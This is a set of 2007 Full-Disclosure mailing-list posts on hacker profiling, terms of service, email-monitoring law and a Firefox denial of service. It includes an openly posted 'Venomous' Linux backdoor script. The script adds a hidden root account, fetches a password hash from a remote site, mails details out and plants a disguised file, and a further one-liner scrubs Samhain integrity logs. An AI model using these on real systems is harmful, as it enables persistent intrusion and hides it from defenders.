63.41% Verdict: MALE REALITY: WRONG To be fair I had to go to the most feminine place I could think of, even then it was iffy. http://groups.ivillage.com/motherdaughter/ Genre: Informal Female = 226 Male = 337 Difference = 111; 59.85% Verdict: Weak MALE Genre: Formal Female = 326 Male = 314 Difference = -12; 49.06% Verdict: Weak FEMALE REALITY: MAYBE THE AUTHOR HERE WAS FLAMINGLY GAY -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Squashing supposed hacker profiling
Steven Adair wrote: Amazing, you were able to find multiple instances where a script-based gender guesser was wrong? This is more profound than the initial research itself. I suppose I could post a series of 10 writings where it was correct, but what would that prove? Did you try reading this from the same page: - Yes I did read the page and I've also read through the obnoxious and smug messages where this theory based hocus pocus voodoo bs is used for so called hacker profiling. Quite frankly I could care less about n3td3v, gobbles and whether or not they're one in the same. The purpose of my message was point out that here is the quote on quote expert Krawetz fingering individuals based on this same concept. While vehemently insisting his method is not flawed I find it ironic that he does not admit to it openly. Sure he can post it on a page, but how about clarifying it openly. I can whip out some Chomsky documents and offer arguments vis-a-vis and I can surely admit publicly when I'm an ass I've done so plenty of times... Krawetz, you need to simmer down on this hacker profiling. You may fool the kiddiots, but how do you know you haven't been fooled. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Shady bastards - CONFIDENTIAL (Terms of Services)
Larry Seltzer wrote: In luxembourg for instance mails labeled as PRIVATE or CONFIDENTIAL are not allowed to be viewed by the company, ALSO as email. Write it in the subject line. Hey, don't read this. This isn't for you. Too late... This makes me wonder at times about the validity and arguments on these signatures as well as so called Terms of Service agreements. For anyone doing legal research, theory work, school work, I implore you to read http://infiltrated.net/tos.html. Technically this Term of Service may be legal... Moral? Absolutely not, but legal, I'm almost sure it can be worded/re-worded to work. Does anyone even read their terms of service when visiting a website, downloading software. I'm willing to say about .0001 percent probably do. I'm willing to be 99.% either ignore them or skim through them. Confidentiality signatures on email? Make zero sense. THIS MESSAGE IS CONFIDENTIAL BUT GOING TO A PUBLIC FORUM. DO NOT READ THIS MESSAGE IF YOU CAME ACROSS THIS MESSAGE FROM A PUBLICLY LINKED SEARCH ENGINE. CLOSE YOUR EYES AND PRETEND IT DOESN'T EXIST. By the way, after you read the TOS, don't forget to contact me afterwards to make payment arrangements. On a more serious note, a TOS such as this one in my opinion, would shoot down the entire concept of the legality of a TOS and some of the claims some TOS' make. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Shady bastards - CONFIDENTIAL (Terms of Services)
For those who didn't bother reading, technically, I can find a legal loophole with the TOS I wrote. Some of you who visited the TOS page, ended up (based on the timing factors I see in access_log) ended up right on my front door. Technically, you are now bound to pay. This to me is a case for arguing over the validity and use of broad terms and semi-uselessness of so called e-contracts/e-agreements/e-signatures and the likes. I think companies love the ability to state this mail is confidential knowing damn well someone will likely not think about the extent of that statement, then turn around and twisting terms for the sake of saving face. Its a dual edged sword, love it or hate it. As for the previous thread and original comments regarding email... Personal work should be left off of any network not OWNED, OPERATED by YOU the individual. It's already established that corporate property whether a paper clip or email is property of the company there are no if ands or butts about it at present time. In funnier matters... That's so broad it can't be considered legal... but usually will be (From the TOS page) *13. LINKS* The Service may provide, or third parties may provide, links to other World Wide Web sites or resources. Because Infiltrated has no control over such sites and resources, you acknowledge and agree that Infiltrated is not responsible for the availability of such external sites or resources, and does not endorse and is not responsible or liable for any Content, advertising, products or other materials on or available from such sites or resources. You further acknowledge and agree that Infiltrated shall not be responsible or liable, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with use of or reliance on any such Content, goods or services available on or through any such site or resource. You also agree that upon visiting the Service, you will pay the Service the sum of $100.00 per visit regardless if you visited the Service willingly or unwillingly. This can, may or may not include indecent redirection to the Service. How's that for obsoleting a law in one swoop. I wonder if I should call a lawyer and sue all the corporations who visited me this morning... I could use some Krispy Kremes, Starbucks, tuition at UConn, Satellite systems, etc. ;) -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fw: [IACIS-L] Statement by Defense Expert
[EMAIL PROTECTED] wrote: So I take it that law enforcement computer examiners and prosecutors *do* have the years of experience in software engineering and exploit construction and use, to qualify them to translate a bit of data into forensic evidence of guilt? Catch 22. This is why prosecutors often rely on expert witnesses who even then are lacking. One of the things many omit in their methods of thinking when it comes to perhaps going to trial is the following, and please take it very seriously... Will the JURY understand it first and foremost, secondly will the jury even give a rats ass. From experience, 1) the jury WILL NOT understand even 1/2 of the terminology nor concepts, analogies you can throw at them. This works to the benefit of whichever side is willing to exploit the jurors. Overwhelm them with so much technology they'll have to believe the accused is guilty. After all, why bring in all of these *experts* (for the prosecution). Overwhelm them with so much technology to counter the former experts expertise and throw in doubt... For the defense. On the latter... While guilty until proven innocent is the American dream, it is seldomly practiced. If so there would be no need for bail since the defendant is after all innocent. (Bottom line holding true to the letter of the law... Not practical but this concept of innocent until proven guilty is flawed). Anyhow, if one were to find themselves on trial this is what you SHOULD expect... You will get a jury of your so called peers.. So let's define peer: Noun 1. peer - a person who is of equal standing with another in a group. Your peers will never be in equal standing from a technological perspective period. For one, it would take a miracle to gather a bunch of computer literate users for jury duty. Heck you will likely find 0 even if one appears for jury duty, it is likely the prosecution will try to rid this person from selection. Its not in their best interest to have someone fully technical on trial for a few reasons. 1) The juror might associate his experiences with the case being tried and taint an outcome based on HIS experience, not the facts presented. Would be the main reason. It might not be in the best interest of the defendant for the same reason. No sir, your peer will consist of someone who's likely going to be computer illiterate, likely twice your age, etc., they'll 1) be frustrated they have to go through jury duty and want to get things over with to return to normal life. 2) They'll be looking like a deer in headlights trying to understand what the hell an expert is talking about: SMTP is a protocol used to deliver electronic mail. This mail consists of binary zeros and ones which when converted formed a corrupted gif image which caused Microsoft's Windows Small Business Server to suffer a buffer overflow. Might sound like clockwork to anyone here, but will sound Klingon to a juror. I could go on and on... But one should be able to envision the possibilities of jurors being lost and irrate. I may or may not do a write up based on my case, but that is likely going to irritate a lot of federal agents and it will likely mean I will end up posting my case files online which will further piss off more federal agents and perhaps place me back to square one. Who knows maybe I will discuss this with an attorney beforehand. Lest I face the wrath of again breaking into an employer while on an airplane. But hey... An expert can always be called in on my defense on how it would have been impossible to spoof over the Atlantic Ocean... Then again, a counterexpert could show the possibility of me hijacking satellite after satellite after satellite for said connection to leave a teasing message saying... Hi I pwnd you for shits and giggles. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
H D Moore wrote: Hello, Some friends and I were putting together a contact list for the folks attending the Defcon conference this year in Las Vegas. My friend sent out an email, with a large CC list, asking people to respond if they planned on attending. The email was addressed to quite a few people, with one of them being David Maynor. Unfortunately, his old SecureWorks address was used, not his current address with ErrattaSec. Since one of the messages sent to the group contained a URL to our phone numbers and names, I got paranoid and decided to determine whether SecureWorks was still reading email addressed to David Maynor. I sent an email to David's old SecureWorks address, with a subject line promising 0-day, and a link to a non-public URL on the metasploit.com web server (via SSL). Twelve hours later, someone from a Comcast cable modem in Atlanta tried to access the link, and this someone was (confirmed) not David. SecureWorks is based in Atlanta. All times are CDT. I sent the following message last night at 7:02pm. --- From: H D Moore hdm[at]metasploit.com To: David Maynor dmaynor[at]secureworks.com Subject: Zero-day I promised Date: Tue, 5 Jun 2007 19:02:11 -0500 User-Agent: KMail/1.9.3 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: 200706051902.11544.hdm[at]metasploit.com Status: RO X-Status: RSC https://metasploit.com/maynor.tar.gz --- Approximately 12 hours later, the following request shows up in my Apache log file. It looks like someone at SecureWorks is reading email addressed to David and tried to access the link I sent: 71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 This address resolves to: c-71-59-27-152.hsd1.ga.comcast.net The whois information is just the standard Comcast block boilerplate. --- Is this illegal? I could see reading email addressed to him being within the bounds of the law, but it seems like trying to download the 0day link crosses the line. Illegal or not, this is still pretty damned shady. Bastards. -HD ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Why would it be illegal if his former employer accessed his email using this method. The information going to their network is considered their property and they could do as they see fit. I could see if in your email you included the almost always ignored disclaimer bs though: THIS EMAIL IS INTENDED FOR THE RECIPIENT'S EYES ONLY. YOU WILL LIKELY IGNORE THIS ANYWAY BUT USING THIS STUPIDLY CRAFTED CONFIDENTIALITY DISCLAIMER, I WILL FILL MORE SPACE IN YOUR INBOX AND GENERATE MORE POINTLESS BANDWIDTH USAGE ON YOUR NETWORK. IF YOU ARE NOT THE INTENDED RECIPIENT READING THIS EMAIL AND OR ATTACHMENTS LINKS ETAL WILL RESULT IN US PRETENDING TO HIRE A LAWYER AND DOING SOMETHING ABOUT IT. I know how many times I've seen these listed with someone shooting off information to mailing lists to do an oops f*** I sent that to the wrong place... What are the options now? Sue everyone who read it? Gash their eyes out. Normally if I were going to send out an email that was *THAT* confidential, I personally do two things: 1) Call the person to make sure they're available to get it. If not its not sent until they're ready. 2) Secondly if I have to post something on my website for someone's personal viewing, I usually do something like: $ echo theirname|md5 6a9c1e04624bcc81a84800b8aa10a1f1 Where the checksum becomes the file and I send them the link to the file. What are the odds of someone finding that checksum... Highly unlikely. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
Tim wrote: Why would it be illegal if his former employer accessed his email using this method. The information going to their network is considered their property and they could do as they see fit. This is a poor assumption. See the Wiretap Act and the Electronic Communications Privacy Act. Of course these are just US laws, but it seems this is the scenario we're discussing. tim Spare me and the list... / * SNIPPED * / What about an employer's right to read e-mails as they come in? As they hit the inbound server? ... If the e-mail is not subject to the consent of all parties, and one of the parties (either the sender or recipient) lives in a jurisdiction that mandates all party consent, then this could be an unlawful interception under state law. (Federal law requires only one party consent.) http://www.securityfocus.com/print/columnists/412 *NOTE Federal Law* /* END SNIP * / Or search ... Nancy K. Garrity, et al. v. John Hancock Mutual Life Ins. Co And no I won't bother with US v. Councilman -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
Tim wrote: Spare you what? If this is somehow off topic, please elaborate. Spare me and the list legalities. One it is slightly offtopic then again this is fd so I retract. That entire argument and any thread arising from what is legal and what is not is likelier to be answered, dissected, studied on a legal forum. Right, so under federal law, single party consent is sufficient. If HD didn't consent, and the former employee currently doesn't consent (i.e. consent under the AUP or other agreements has expired), then it could be illegal. That, or if the person reading the stored communications is not authorized by the company, then they would be personally liable. Laws are not about what could or should. They're about what's written. In this case, he sent an email to someone's former workplace. The worker was not there, the employer obviously read the email. So the questions to ask should be 1) HD didn't give consent, did/does the employer have something written to their employees which states the monitoring of email. If they do, case closed there is the one party federal consent. Secondly, did HD specify in his email any legalities of unauthorized reading. No. Thirdly, you need to realize what you've stated and your misinterpretation of the law. ECPA protects against INTERCEPTION. No interception occurred here, the mail was delivered to a recipient. Your conjecture that it's legal because the employer somehow owns the communication or the networks it travels over is completely bogus. The recipient is this email user, not the company. The network is the company's and all of its communications into or out are property of the company. http://www.redearthsoftware.com/email-monitoring-article.htm Email auditing and email interception A second distinction to make is the difference between email auditing (sometimes called email monitoring), where email is checked after the actual transmission, and email interception (sometimes called email filtering), where email is intercepted and checked during transmission. Yup just looked this up. This was thrown out because Nancy consented under JH's email privacy policy. I don't see how this conflicts with my argument. tim Rinse and repeat this post and my comments.. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
Tim wrote: As mentioned multiple times by multiple posters, but apparently eluded your reading, the recipient's consent: A) May have never been given B) May have expired with the employment contracts C) May not apply at all if the monitoring party was not given authorization by the company You're basing your arguments on assumption... A) I don't know ... Do you? B) Most contracts have expiry dates on NDA's if signed. More then likely with a security company. C) You don't know. I don't know. We can infer from B) and C) that 1) recipient worked for a security company. 2) More than likely signed an NDA or contractual agreement 3) Because they are a security company in place, they *should have* had some form of policy in place detailing things. So if 2 and 3 are correct, there is no law broken period. So re-posting: / *SNIPPET * / Courts have held that the wiretap law required interception in transmission before - finding that seizing of a computer gaming company's email, perusing a secure website under false pretenses, reading an independent insurance agent's corporate email, installing and using tracking cookies, and even hacking into a computer and retrieving email does not violate the wiretap law. / * STOP FOR A SECOND * / See the last sentence? /* SNIPPET * / The courts have observed that to intercept something, according to the dictionary, is to stop, seize, or interrupt in progress or course before arrival and therefore that a contemporaneous interception - i.e., an acquisition during flight - is required to implicate the Wiretap Act. /* STOP AGAIN */ See this last sentence? /* SNIPPET */ Several court cases have upheld that checking email after transmission is legal (i.e. email auditing), since it is viewed as no different than searching through a file in an employee's drawer. /* END SNIPPET */ So before I go on... May I ask you how many times have you dealt with these issues or anything like them in court? Care to ask me the same? See: The Ordinary Course of Business Exception http://www.law.duke.edu/journals/dltr/articles/2001dltr0026.html http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/ http://thomas.loc.gov/cgi-bin/query/z?c109:S.936: -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
Tim wrote: This definitely could apply in the case of the ECPA, but could get dicey, since ordinary course of business is ill-defined and I suspect would require some serious legal wrangling to argue. Does this business regularly read everyone's email? In any case, whether they were legally permitted to monitoring that email box or not, you really should work on your debate skills. Attacking one point by changing to another doesn't take the discussion anywhere. The offensive tone your initial emails took on was really unwarranted. There's no need to make every thread a flame war. tim AGAIN... VERBATIM NOT MY *SUGGESTION/NOTION/INFERRENCE* / * PLAIN ENGISH VERSION * / http://republicans.energycommerce.house.gov/107/Hearings/04032001hearing154/Lamb234.htm V. Electronic Communications Privacy Act The Electronic Communication Privacy Act of 1986 (ECPA), 18 U.S.C. 2510-2522; 2701; was enacted to address potential privacy issues related to the growing use of computers and other new forms of electronic communications. It added provisions to the federal criminal code that extended the prohibition against the unauthorized interception of communications to specific types of electronic communications, including e-mail, pagers, cellular telephones, voice mail, remote computing services, private communication carriers, and computer transmissions. The Act also identified situations and types of transmissions that would not be protected, most notably an employer's monitoring of employee electronic mail on the employer's system. / * END * / Do you see or not see the sentence not be protected most notably an employer's monitoring... EMPLOYER'S SYSTEM? Do you not see the plain English wording unauthorized interception of. Now take good note of this from someone who has been to court... Everything is as broad as broad can be. Its purposefully done this way if you ask me and the arguments come out AFTER the fact hence new cases being cited and quoted. So literally the law states unlawful intercept and would not be protected... employer monitoring so take these two things literally assuming it were you in a court of law, you being the employer. Defense: Client violated the ECPA act foo Plaintiff: There was NEVER AN INTERCEPTION. The email was DELIVERED to his EMPLOYER'S SERVER Point blank. Unless you cite another case where some company was found guilty of snooping to argue this, point is moot. And I am not just talking or inferring anything. I've posted ENOUGH information to give you a clue about FACTS not inferences. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ECPA Plain English 101 Employer vs. Employee
Cyberspace Law Institute http://www.cli.org/emailpolicy/ECPA.html /* BOTTOM LINE LEGALESE */ The special limitations on disclosure of private email, in ECPA, expressly apply only to those who provide electronic communications services to the public -- and an internal system provided by an employer to employees would not be so characterized. The ECPA also permits access to private communication with the consent of either the sender or the recipient. Employees may (have to...) agree to such access (by authorized persons) in the email policy of the company. But even if there is no agreement the ECPA only prohibits interception in real-time transmissions; email is usually (or at least can be) stored and can be accessed by the system administrator who usually will be the employer. http://www.law.duke.edu/journals/dltr/articles/2001dltr0026.html http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/ http://thomas.loc.gov/cgi-bin/query/z?c109:S.936: http://email.about.com/library/weekly/aa080398a.htm -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
Dude VanWinkle wrote: On 6/6/07, Larry Seltzer [EMAIL PROTECTED] wrote: Really? I have gotten benefits and medical communications at my office addy. That stuff should be going to your home address, not least for this reason. Is should relevant? Is it a violation of HIPAA to read these communications, even if I have these communications sent to my work addy? any lawyers on the list? -JPwho's Draft was autosaved at 2:49 pm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Medical and Workplace Privacy http://lorrie.cranor.org/courses/fa04/work2.ppt Permits identification of the individual (or creates a reasonable basis upon which to identify the individual) 45 CFR §164.501 Also see Office Snooping: The information was learned in a routine audit of the company’s health plan for fraud, drug abuse, and excessive costs No prohibition against employers making use of medical records in employment decisions All co-employees had a “need to know” -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux big bang theory....
Vincent Archer wrote:
On Sun, 2007-05-13 at 23:07 -0700, Andrew Farmer wrote:
This script really doesn't prove anything, though. All it shows is
that a compromised machine can be difficult to impossible to clean
properly - which has been known for a *long* time. Ken Thompson
discussed a much cleverer one in Trusting Trust. It's also worth
noting that this is in no way specific to UNIX systems. It's simply
an unalterable fact that, once an attacker has had full access to the
machine, it's possible for them to make changes which will allow them
reentry at a later date.
I don't have (and I doubt anybody around here can) the proof to make
this a theorem, but it is a good postulate:
- It is impossible to prove the integrity of a computing system from
within the same system.
In olden days, this created the fundamental rules for systems like
Tripwire: place the signatures on non-alterable storage, run tripwire in
single user mode (ahh, the naive assumption that single user mode would
be safe enough).
Today, the preferred method of checking the integrity of a system
involves virtualisation of said system, and verification from the
hosting component of the hosted one. Or the hammer approach of erasing
the state of the system after use, and rolling it back to a proven
safe and stable one.
I've added a function to hide the script from showing up on Samhain
awk -vfilename=$filename '{print perl -pi -e
'\''s/'$filename'/samhain/g'\''}' /var/log/samhain_log|sh
What is does when run now is look for the instance of its name (the
backdoor's name) and rename it to Samhain. So if the file created
is called foo.h and Samhain logs it, it will go and rename foo.h
in the logs to Samhain. Tripwire is no difference unless both logs
are kept offline. On a side note, I started tinkering with a triple
threat mechanism of checksums: (SHA1 + MD5 + RIPE160)
http://www.infiltrated.net/scripts/saki.html
Just don't know if I want to devote time to doing a full blown
program. It works as is, but does nothing more than checksum
whatever is in my current path of which later I can do a diff
etc.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'
Wise men talk because they have something to say;
fools, because they have to say something. -- Plato
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux big bang theory....
KJKHyperion wrote: why, Windows machines of course, I'm an attacker, not a fool! If you were a terrorist, what would you rather do? Crash the Twin Towers Crash the dollar There is no such thing as an attacker. All actions, even such an individual's, are driven by economical considerations. With this said, if I were an attacker with economics in mind why would I want to target a machine which has X amount of vendors sifting through the much of malware and viruses when I could spawn off an semi undetectable program and KEEP IT THERE without having to wait for the next best thing. I don't know about your logics on economics, but if I were the attacker and I was looking for a constant steady stream of revenue, I would go the Linux route. And if you think for a second that Boohoo Linux users are more inclined to be security conscious then you are the fool here. Of the couple of thousand of brute force bots I see, none are on Windows. Whatever though, to each their own mechanisms of thought. If you truly believe its all fine and dandy and things won't get progressively worse by giving Linux to inexperienced users, you are in for a rude awakening. If you haven't stopped to read the facts that malware, *ware creators are getting more savvy, then you seem to be stuck somewhere in a world of fantasy. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Linux big bang theory....
Enjoy||Complain
# !/bin/sh
# Venomous
# Linux PoC backdoor keeper...
# http://www.infiltrated.net/ubuntuDestruction.php
# J. Oquendo (c) 05/09/2007
# If you have to ask you shouldn't run this password for venomous
# is password
happy=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F : 'BEGIN{OFS=:}{$1=venomous}1{$2=}2' $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F :
'BEGIN{OFS=:}{$2='guitar'}2' $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ){print $4
-a}'`
echo Enter your email address ; read ans ; where=$ans
$who | $what $where
# Ugly method too keep a rootaccount Follows... For those not in the know...
# Venomous was an idea made to prove a point, not give script kiddiots another
# tool to be morons with. Instead of ruining things, how about solving...
# Instead of naysaying... Prove me wrong
# Pick a ranDumb file in /usr/includes/ then create the samevbackdoor on the
# system using this filename. Do something sneaky on your own to place this
# file on a startup I could show you, but then I would have to kill -9 you
# Note the location... Highly doubtable to remove an actual include file
# unless some stupid admin did something really dumb... Before someone mouths
# around via e-mail... I could have written this all inclusively but I chose
# not to for obvious reasons...
random=`date|awk -F : '{print $3}'|awk '{print $1}'`
echo $random /tmp/secCommand
sad=`awk '{print ls /usr/include|sed -n '\''$1p'\''}' /tmp/secCommand|sed
-n '1p'`
rm /tmp/secCommand
filename=`echo $sad|sh|awk -F . '{print $1}'`
lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n '226,233p'
/usr/local/include/$filename.h
# Now of course I could have modified this to replicate any one of the files
# on startup but again... PoC ... The naysayers will ramble on about You're
# out of your mind... Am I? I've given you the PoC's what more do you want...
# Ubuntu or any Linux for the lowly home user is a horrible idea...
# And AGAIN before someone fires off I would see the URL and that's a dead
# giveaway! ... Look, I'm trying to make a point here... I could have
# a functioning backdoor undetectable to most integrity checkers, Samhain,
# Tripwire etc., but why should I disclose this anywhere. It's not in the
# best interest of anyone to do so... Don't bother asking for it via email
# because it's not public and will never be...
# This again... Was to prove a point to the naysayers who this shit doesn't
# happen... Keep dreaming. Its only a matter of time before you guys go
# Goo Goo about getting Linux for Idjits off the ground, but its a horrible
# mistake in the making
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'
Wise men talk because they have something to say;
fools, because they have to say something. -- Plato
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Anyone have a Lindows/Linspire contact
Sorry to ask this of anyone on this list... If it bugs someone please respond offlist no need to irritate others more than I already have... I'm hoping someone could provide me with a direct contact for someone in Lindows/Linspire/*whatever*umbrella*name. Seems they have a security issue on their hands... Tried getting information from their fluffy website, no dice. Tried whois, etc., no direct names available... -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Follow up browser DoS
Comments on Firefox 2.0.3 ... Mines hangs then regains its composure after about 2 solid minutes of being stuck in hell. Did nothing to Opera on Windows, OpenBSD or Linux... Seemed to also toast out Firefox on FC5. Caused system to respond horribly. [EMAIL PROTECTED] ~]# yum update firefox Loading installonlyn plugin Setting up Update Process Setting up repositories core [1/3] . -- Populating transaction set with selected packages. Please wait. --- Downloading header for firefox to pack into transaction set. firefox-1.5.0.10-1.fc5.i3 100% |=| 82 kB00:00 --- Package firefox.i386 0:1.5.0.10-1.fc5 set to be updated -- Running transaction check Dependencies Resolved = Package Arch Version RepositorySize = Updating: firefox i386 1.5.0.10-1.fc5 updates18 M Transaction Summary = Install 0 Package(s) Update 1 Package(s) Remove 0 Package(s) Total download size: 18 M Is this ok [y/N]: y Downloading Packages: (1/1): firefox-1.5.0.10-1 100% |=| 18 MB01:27 Running Transaction Test Finished Transaction Test Transaction Test Succeeded Running Transaction Updating : firefox # [1/2] Cleanup : firefox # [2/2] Updated: firefox.i386 0:1.5.0.10-1.fc5 Complete! Copied and pasted top information ... Took me 3 minutes to actually copy and paste the information... Tasks: 118 total, 1 running, 116 sleeping, 0 stopped, 1 zombie Cpu(s): 73.7% us, 25.3% sy, 0.0% ni, 0.0% id, 0.0% wa, 1.0% hi, 0.0% si Mem: 1034412k total, 1019464k used,14948k free, 1600k buffers Swap: 2031608k total, 317436k used, 1714172k free,41184k cached PID USER PR NI VIRT RES SHR S %CPU %MEMTIME+ COMMAND 27474 root 18 0 1178m 838m 17m D 1.0 83.0 0:21.43 firefox-bin [EMAIL PROTECTED] ~]# killall -9 firefox-bin firefox-bin: no process killed [EMAIL PROTECTED] ~]# killall -9 firefox-bin [EMAIL PROTECTED] ~]# Killed it once... Nope... System didn't even acknowledge it. Stood running for a few seconds till I killall -9'd it again. Damn you firefox! -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INVASION OF THE CHILD HACKERS
